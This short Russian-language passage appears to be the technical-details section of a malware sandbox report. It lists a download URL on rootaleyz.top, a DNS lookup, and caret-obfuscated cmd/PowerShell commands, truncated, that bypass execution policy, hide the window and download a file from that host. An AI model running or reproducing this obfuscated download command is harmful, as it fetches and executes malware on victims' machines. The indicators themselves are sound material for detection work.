Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^w^E^RshelL^.eX^E -^ExeCUTI^on^PO^LIcY B^yPa^sS^ -n^o^p^rofIL^E^ ^-Win^d^o^wS^Tyl^e^ ^Hi^Dden (nEW-o^bJe^cT^ ^sY^S^TEm.n^E^T^.w^EBCLI^Ent).^dow^NlOa^dfil^e('http://root...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "PO^w^E^RshelL^.eX^E -^ExeCUTI^on^PO^LIcY B^yPa^sS^ -n^o^p^rofIL^E^ ^-Win^d^o^wS^Tyl^e^ ^Hi^Dden (nEW-o^bJe^cT^ ^sY^S^TEm.n^E^T^.w^EBCLI^Ent).^dow^NlOa^dfil^e('http://root...' (со скрытым окном)